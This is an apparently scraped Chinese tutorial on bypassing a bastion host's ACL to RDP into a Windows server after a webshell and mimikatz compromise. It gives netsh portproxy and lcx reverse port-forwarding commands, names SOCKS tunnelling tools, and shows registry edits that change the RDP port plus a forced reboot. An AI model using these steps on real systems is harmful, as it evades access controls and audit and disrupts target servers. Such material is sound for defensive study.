通过堡垒机rdp 黑屏_如何绕过堡垒机远程登录
假设一个场景: 在Webshell中执行mimikatz获取到win用户密码,并且本地查看端口3389是开放的,从当前攻击跳板机无法远程到目标机器。但是因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办呢?
首先我们先分析一下这个场景,端口开放却无法连接,最有可能的情况,就是目标网段通过ACL控制,只允许通过堡垒机登录。大多数堡垒机部署时,为了不改变现有的网络拓扑结构,考虑采用旁路部署的方案,通过ACL策略限制用户访问特定端口。
那么这个问题,我们就可以用另一种方式来描述:目标服务器远程端口受到ACL策略访问限制,但其他端口没有限制,那么,最简单的解决方式就可以通过端口转发来绕过。
1、使用netsh命令进行端口转发
Windows自带的netshnetsh实现端口转发,监听12345端口,转发到本地3389端口,可绕过访问策略限制。
#A、3389端口转发到12345端口
netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389
#B、查看配置好的端口映射清单
C:\Windows\system32>netsh interface portproxy show v4tov4
侦听 ipv4: 连接到 ipv4:
地址 端口 地址 端口
--------------- ---------- --------------- ----------
192.168.126.32 12345 192.168.126.32 3389
这样一来,通过攻击机跳板机直接远程目标机器的12345端口,就可以实现远程登录。
2、LCX 端口转发
在目标机器上执行:lcx.exe -slave 公网ip 51 内网ip 3389
在公网的机器执行:Lcx.exe –listen 51 3340
本地机器上连接 127.0.0.1:3340,即可连接上目标机器的3389。
3、内网穿透工具
SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等
通过利用SOCKS协议,结合Proxifier使用,可实现mstsc登录目标主机。
4、修改Windows远程桌面端口
通过修改Windows默认远程桌面端口,从而绕过ACL策略访问限制。
修改注册表,命令如下:
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f
REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f
强制重启目标服务器后,注册表生效。
shutdown -r -t 0
此时,就可以远程目标服务器的12345登录。
通过堡垒机rdp 黑屏_如何绕过堡垒机远程登录相关推荐
- 通过堡垒机rdp 黑屏_运维堡垒机无法连接服务器,远程桌面无法使用
有时候我们的服务器用着好端端的,就突然出现各种问题,小编所在的公司也经常有这种情况发生,现在就给大家分享我今天解决的一个案例: 公司的windows服务器多数采用"运维安全审计系统" ...
- 通过堡垒机rdp 黑屏_[调优]彻底解决RDP连接过程缓慢的问题
无论在物理PC还是虚拟机,无论Win7/2008还是Win10/2019,你都会遇到RDP连接过程缓慢的问题,虽然只是IT管理员偶尔用一下,但还是相当恼人,不知道那些使用Microsoft VDI产品 ...
- 通过堡垒机rdp 黑屏_【UMA】堡垒机RDP远程桌面和console的区别
堡垒机运维RDP我们经常用到,肯定会发现还有个console模式,具体有什么区别呢? 查了一些资料,应该是这样,mstsc登陆,只要连接数没达到上限,那么显示的是另外一个桌面,是个虚拟桌面,每个连接都 ...
- iphonex黑屏开不了机_iphonexr黑屏,iphonexr突然开不了机
最近很多朋友都在询问关于iphonexr黑屏,iphonexr突然开不了机的问题,今天就来跟大家聊一聊手机无法开机这个话题,希望可以帮助到有需要的朋友. iphonexr黑屏,iphonexr突然开不 ...
- 黑苹果睡眠重启后死机_iPhone卡屏、死机、黑屏?| 学会这招,秒解!
对于喜欢折腾手机的用户来说,最害怕遇到的就是手机卡屏.死机.黑屏了,当然,遇到这样的情况也不必担心,因为这些问题大都有一些万能的解决办法:刷机重启.卸载重装.清除数据.这些办法可能对于Android用 ...
- ubantu 黑屏_手机黑屏、卡屏怎么办?几招就能轻松搞定!
手机这个功能尤其丰富的东西,偶尔也会出现一些小毛病,比如说手机黑屏.卡屏,这对大部分用户来说应该都有遇到过.手机黑屏这真的是一件让人揪心又无奈的事情,相对于懂得这方面技术的人来说,毫无疑问是小菜一碟, ...
- 计算机黑屏死机,电脑黑屏死机怎么解决(一键修复电脑黑屏死机的方式)
世界上有很多东西都会随着时间发生改变,但是Windows的BUG却不会. 对于微软来说,Windows系统在更新的同时又带来一堆BUG,已经是一项传统艺能. 放眼全球,大部分用户都曾遭到过Window ...
- 微信小程序图片全屏预览组件,并解决svg真机显示黑屏问题
自己码了个微信小程序图片全屏预览组件,并解决了svg真机显示黑屏问题(即png等格式可以正常显示,但就svg无法显示). /*** 微信小程序图片预览组件* 1.支持预览svg.png.jpeg.jp ...
- iphonex黑屏开不了机_iphonex黑屏就算强制开机也开不了,是什么原因?_杭州维修...
手机不能打开机器,分为多种,如果有崩溃故障.电脑突然黑屏. 那就别大惊小怪了,只要联系苹果售后人员进行预约测试就行了. 如果你按住开机键不开,记得不要再试一次,以免造成电话系统故障.苹果手机突然黑屏. ...
最新文章
- java swing 链接_JAVA中Jtable标签设置超级链接:基于Java Swing的超链接标签和超链接按钮的实现...
- 一文带你学会基于SpringAop实现操作日志的记录
- 笔试:当一个线程进入一个对象的一个synchronized方法后,其它线程是否可进入此对象的其它方法? ?(2nd)...
- Java技术:Mybatis-plus常用API全套教程,值得收藏!
- python共享内存mmap_python - IPC在单独的Docker容器中的Python脚本之间共享内存 - 堆栈内存溢出...
- [Python] 字典 vars()函数:以字典类型提取对象的属性和属性值
- 安装node.jsvue3.0脚手架
- 大学python教材电子版下载_Python数据分析基础(全国高等院校应用型创新规划教材·计算机系列)...
- mac 终极教程,最全,最实用的教程
- Photoshop - CMYK 和 RGB 区别是什么?
- JavaWeb kuangshen汇总
- Python文件操作-替换srt文件行文本
- 电子制造业生产车间物料怎么管?方法有哪些
- STM32 驱动液晶LCD12864
- 卸载Photoshop
- 贪心算法解决tsp问题
- Web简历信息管理系统
- mp4格式封装工具MP4Box(十一)
- 2Kx4位的存储芯片组成16Kx8位的存储器,具体看详细~
- 用java编写输出直角三角型、倒直角三角形